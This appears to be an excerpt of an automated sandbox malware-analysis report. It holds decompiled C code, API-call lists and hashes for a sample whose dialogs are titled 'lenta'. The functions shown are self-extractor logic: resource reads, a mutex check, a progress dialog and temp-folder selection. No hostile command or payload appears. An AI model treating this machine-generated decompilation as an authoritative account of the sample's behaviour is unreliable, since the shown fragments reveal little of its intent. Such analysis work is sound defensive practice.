                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010E3410
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000836), ref: 010E3426
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 010E342D
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 010E343F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$lenta
                                                                                                                                                                                                                                                • API String ID: 2418873061-1872994565
                                                                                                                                                                                                                                                • Opcode ID: 145b4d2bdf9ffb034c02ce211f3fddbffdfc3fd4da29a022d9a17e58b1c0d5f1
                                                                                                                                                                                                                                                • Instruction ID: 1fa387ff40097ebe925d4292f55383f98a591a15c6cc6a97118c38790048bd7e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 145b4d2bdf9ffb034c02ce211f3fddbffdfc3fd4da29a022d9a17e58b1c0d5f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C951B370341240AEE7725A3B5C4CFBF6DD9BB89B54F4080A9F6C59F2C5CEA9D8019361
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				struct HRSRC__* _t31;
                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t13 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                                				_t65 = 0;
                                                                                                                                                                                                                                                				_t66 = __ecx;
                                                                                                                                                                                                                                                				_t48 = __edx;
                                                                                                                                                                                                                                                				 *0x10e9a3c = __ecx;
                                                                                                                                                                                                                                                				memset(0x10e9140, 0, 0x8fc);
                                                                                                                                                                                                                                                				memset(0x10e8a20, 0, 0x32c);
                                                                                                                                                                                                                                                				memset(0x10e88c0, 0, 0x104);
                                                                                                                                                                                                                                                				 *0x10e93ec = 1;
                                                                                                                                                                                                                                                				_t20 = E010E468F("TITLE", 0x10e9154, 0x7f);
                                                                                                                                                                                                                                                				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                                					_t64 = 0x4b1;
                                                                                                                                                                                                                                                					goto L32;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                                					 *0x10e858c = _t27;
                                                                                                                                                                                                                                                					SetEvent(_t27);
                                                                                                                                                                                                                                                					_t64 = 0x10e9a34;
                                                                                                                                                                                                                                                					if(E010E468F("EXTRACTOPT", 0x10e9a34, 4) != 0) {
                                                                                                                                                                                                                                                						if(( *0x10e9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                                							 *0x10e9120 =  *0x10e9120 & _t65;
                                                                                                                                                                                                                                                							if(E010E5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                                								if( *0x10e8a3a == 0) {
                                                                                                                                                                                                                                                									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                                									if(_t31 != 0) {
                                                                                                                                                                                                                                                										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if( *0x10e8184 != 0) {
                                                                                                                                                                                                                                                										__imp__#17();
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if( *0x10e8a24 == 0) {
                                                                                                                                                                                                                                                										_t57 = _t65;
                                                                                                                                                                                                                                                										if(E010E36EE(_t65) == 0) {
                                                                                                                                                                                                                                                											goto L33;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t33 =  *0x10e9a40; // 0x3
                                                                                                                                                                                                                                                											_t48 = 1;
                                                                                                                                                                                                                                                											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                                												if(( *0x10e9a34 & 0x00000100) == 0 || ( *0x10e8a38 & 0x00000001) != 0 || E010E18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                                													goto L30;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t64 = 0x7d6;
                                                                                                                                                                                                                                                													if(E010E6517(_t57, 0x7d6, _t34, E010E19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                                														goto L33;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L30;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												L30:
                                                                                                                                                                                                                                                												_t23 = _t48;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t23 = 1;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E010E2390(0x10e8a3a);
                                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t64 = 0x520;
                                                                                                                                                                                                                                                								L32:
                                                                                                                                                                                                                                                								E010E44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                								goto L33;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t64 =  &_v268;
                                                                                                                                                                                                                                                							if(E010E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                								goto L3;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                                								 *0x10e8588 = _t43;
                                                                                                                                                                                                                                                								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									if(( *0x10e9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                                										_t64 = 0x524;
                                                                                                                                                                                                                                                										if(E010E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                                											goto L12;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L11;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t64 = 0x54b;
                                                                                                                                                                                                                                                										E010E44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                                										L11:
                                                                                                                                                                                                                                                										CloseHandle( *0x10e8588);
                                                                                                                                                                                                                                                										 *0x10e9124 = 0x800700b7;
                                                                                                                                                                                                                                                										goto L33;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                						_t64 = 0x4b1;
                                                                                                                                                                                                                                                						E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						 *0x10e9124 = 0x80070714;
                                                                                                                                                                                                                                                						L33:
                                                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                0x010e2eba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2ece
                                                                                                                                                                                                                                                0x010e2ede
                                                                                                                                                                                                                                                0x010e2eed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2eed
                                                                                                                                                                                                                                                0x010e2eef
                                                                                                                                                                                                                                                0x010e2eef
                                                                                                                                                                                                                                                0x010e2eef
                                                                                                                                                                                                                                                0x010e2eef
                                                                                                                                                                                                                                                0x010e2ea2
                                                                                                                                                                                                                                                0x010e2e86
                                                                                                                                                                                                                                                0x010e2e88
                                                                                                                                                                                                                                                0x010e2e88
                                                                                                                                                                                                                                                0x010e2e43
                                                                                                                                                                                                                                                0x010e2e48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2e48
                                                                                                                                                                                                                                                0x010e2e30
                                                                                                                                                                                                                                                0x010e2e30
                                                                                                                                                                                                                                                0x010e2ef8
                                                                                                                                                                                                                                                0x010e2f01
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2f01
                                                                                                                                                                                                                                                0x010e2d8a
                                                                                                                                                                                                                                                0x010e2d8f
                                                                                                                                                                                                                                                0x010e2da1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2da3
                                                                                                                                                                                                                                                0x010e2dae
                                                                                                                                                                                                                                                0x010e2db4
                                                                                                                                                                                                                                                0x010e2dbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2dca
                                                                                                                                                                                                                                                0x010e2dd3
                                                                                                                                                                                                                                                0x010e2df5
                                                                                                                                                                                                                                                0x010e2e02
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2dd5
                                                                                                                                                                                                                                                0x010e2dde
                                                                                                                                                                                                                                                0x010e2de3
                                                                                                                                                                                                                                                0x010e2e04
                                                                                                                                                                                                                                                0x010e2e0a
                                                                                                                                                                                                                                                0x010e2e10
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2e10
                                                                                                                                                                                                                                                0x010e2dd3
                                                                                                                                                                                                                                                0x010e2dbb
                                                                                                                                                                                                                                                0x010e2da1
                                                                                                                                                                                                                                                0x010e2d5b
                                                                                                                                                                                                                                                0x010e2d5b
                                                                                                                                                                                                                                                0x010e2d5d
                                                                                                                                                                                                                                                0x010e2d69
                                                                                                                                                                                                                                                0x010e2d6e
                                                                                                                                                                                                                                                0x010e2f06
                                                                                                                                                                                                                                                0x010e2f06
                                                                                                                                                                                                                                                0x010e2f06
                                                                                                                                                                                                                                                0x010e2d59
                                                                                                                                                                                                                                                0x010e2f18

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E2CD9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E2CE9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E2CF9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2D34
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2D40
                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2DAE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010E2DBD
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2E0A
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                                • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                                • Opcode ID: f6904a70dfa99ee7dd9c7edf99ff9a0223097247fde51a6f186ecf565e7c7c03
                                                                                                                                                                                                                                                • Instruction ID: 01148ec295ee094816655b86a1042b53477751706ba9d9cd9aa7aab56bc868e4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6904a70dfa99ee7dd9c7edf99ff9a0223097247fde51a6f186ecf565e7c7c03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451D7703403119EF774AA279D4DB7A3ADCEB95B04F04806DE6C1DA2C9DAB9C8418751
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                                			E010E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                				struct HWND__* _t35;
                                                                                                                                                                                                                                                				struct HWND__* _t38;
                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t9 == 0) {
                                                                                                                                                                                                                                                					__eflags = 1;
                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					 *0x10e91d8 = 1;
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					_push(_a4);
                                                                                                                                                                                                                                                					L21:
                                                                                                                                                                                                                                                					EndDialog();
                                                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                                				_pop(1);
                                                                                                                                                                                                                                                				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                                				if(_t12 == 0) {
                                                                                                                                                                                                                                                					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                                					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L19;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                                                                                                                					_t35 = _a4;
                                                                                                                                                                                                                                                					 *0x10e8584 = _t35;
                                                                                                                                                                                                                                                					E010E43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                                					__eflags =  *0x10e8184; // 0x1
                                                                                                                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                                                                                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                                					_t17 = CreateThread(0, 0, E010E4FE0, 0, 0, 0x10e8798);
                                                                                                                                                                                                                                                					 *0x10e879c = _t17;
                                                                                                                                                                                                                                                					__eflags = _t17;
                                                                                                                                                                                                                                                					if(_t17 != 0) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						E010E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(_t35);
                                                                                                                                                                                                                                                						goto L21;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t23 = _t13 - 1;
                                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                                					__eflags = _a12 - 2;
                                                                                                                                                                                                                                                					if(_a12 != 2) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					ResetEvent( *0x10e858c);
                                                                                                                                                                                                                                                					_t38 =  *0x10e8584; // 0x0
                                                                                                                                                                                                                                                					_t25 = E010E44B9(_t38, 0x4b2, 0x10e1140, 0, 0x20, 4);
                                                                                                                                                                                                                                                					__eflags = _t25 - 6;
                                                                                                                                                                                                                                                					if(_t25 == 6) {
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						 *0x10e91d8 = 1;
                                                                                                                                                                                                                                                						SetEvent( *0x10e858c);
                                                                                                                                                                                                                                                						_t39 =  *0x10e879c; // 0x0
                                                                                                                                                                                                                                                						E010E3680(_t39);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t25 - 1;
                                                                                                                                                                                                                                                					if(_t25 == 1) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetEvent( *0x10e858c);
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                                					TerminateThread( *0x10e879c, 0);
                                                                                                                                                                                                                                                					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                0x010e3553
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e355f
                                                                                                                                                                                                                                                0x010e3565
                                                                                                                                                                                                                                                0x010e357c
                                                                                                                                                                                                                                                0x010e3581
                                                                                                                                                                                                                                                0x010e3584
                                                                                                                                                                                                                                                0x010e359b
                                                                                                                                                                                                                                                0x010e35a1
                                                                                                                                                                                                                                                0x010e35a7
                                                                                                                                                                                                                                                0x010e35ad
                                                                                                                                                                                                                                                0x010e35b3
                                                                                                                                                                                                                                                0x010e35b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e35b8
                                                                                                                                                                                                                                                0x010e3586
                                                                                                                                                                                                                                                0x010e3588
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3590
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3590
                                                                                                                                                                                                                                                0x010e3524
                                                                                                                                                                                                                                                0x010e3535
                                                                                                                                                                                                                                                0x010e3541
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3549
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000), ref: 010E3535
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 010E3541
                                                                                                                                                                                                                                                • ResetEvent.KERNEL32 ref: 010E355F
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(010E1140,00000000,00000020,00000004), ref: 010E3590
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E35C7
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 010E35F1
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 010E35F8
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 010E3610
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 010E3617
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 010E3623
                                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 010E3637
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 010E3671
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 26b12be7d6d6d3ed9bc90a98439116592647ca92a32535a1c2a6a875e194e4d1
                                                                                                                                                                                                                                                • Instruction ID: 1b70ce64f3507b84bd6f05b036b60da2e33cd2aff80eb21ccddd88e7c98fb504
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26b12be7d6d6d3ed9bc90a98439116592647ca92a32535a1c2a6a875e194e4d1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91314C71240201AFD7701A3BAC4DE6A3EE9F789F51F14856AF6D29F298CA7A8400CB54
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                                			E010E4224(char __ecx) {
                                                                                                                                                                                                                                                				char* _v8;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                                				char* _v28;
                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                                                                				char _v48;
                                                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                                				char* _t44;
                                                                                                                                                                                                                                                				char* _t61;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				char* _t65;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                				char _t67;
                                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                                				char _t76;
                                                                                                                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t67 = __ecx;
                                                                                                                                                                                                                                                				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                                				if(_t66 == 0) {
                                                                                                                                                                                                                                                					_t63 = 0x4c2;
                                                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                                                					E010E44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                                				_v12 = _t26;
                                                                                                                                                                                                                                                				if(_t26 == 0) {
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					FreeLibrary(_t66);
                                                                                                                                                                                                                                                					_t63 = 0x4c1;
                                                                                                                                                                                                                                                					goto L22;
	}
	_t28 = GetProcAddress(_t66, 0xc3);
	_v20 = _t28;
	if(_t28 == 0) {
		goto L20;
	}
	_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
	_v16 = _t29;
	if(_t29 == 0) {
		goto L20;
	}
	_t76 =  *0x10e88c0; // 0x0
	if(_t76 != 0) {
		L10:
		 *0x10e87a0 = 0;
		_v52 = _t67;
		_v48 = 0;
		_v44 = 0;
		_v40 = 0x10e8598;
		_v36 = 1;
		_v32 = E010E4200;
		_v28 = 0x10e88c0;
		 *0x10ea288( &_v52);
		_t32 =  *_v12();
		if(_t71 != _t71) {
			asm("int 0x29");
		}
		_v12 = _t32;
		if(_t32 != 0) {
			 *0x10ea288(_t32, 0x10e88c0);
			 *_v16();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
			if( *0x10e88c0 != 0) {
				E010E1680(0x10e87a0, 0x104, 0x10e88c0);
			}
			 *0x10ea288(_v12);
			 *_v20();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
		}
		FreeLibrary(_t66);
		_t85 =  *0x10e87a0; // 0x0
		return 0 | _t85 != 0x00000000;
	} else {
		GetTempPathA(0x104, 0x10e88c0);
		_t61 = 0x10e88c0;
		_t4 =  &(_t61[1]); // 0x10e88c1
		_t65 = _t4;
		do {
			_t42 =  *_t61;
			_t61 =  &(_t61[1]);
		} while (_t42 != 0);
		_t5 = _t61 - _t65 + 0x10e88c0; // 0x21d1181
		_t44 = CharPrevA(0x10e88c0, _t5);
		_v8 = _t44;
		if( *_t44 == 0x5c &&  *(CharPrevA(0x10e88c0, _t44)) != 0x3a) {
			 *_v8 = 0;
		}
		goto L10;
	}
}
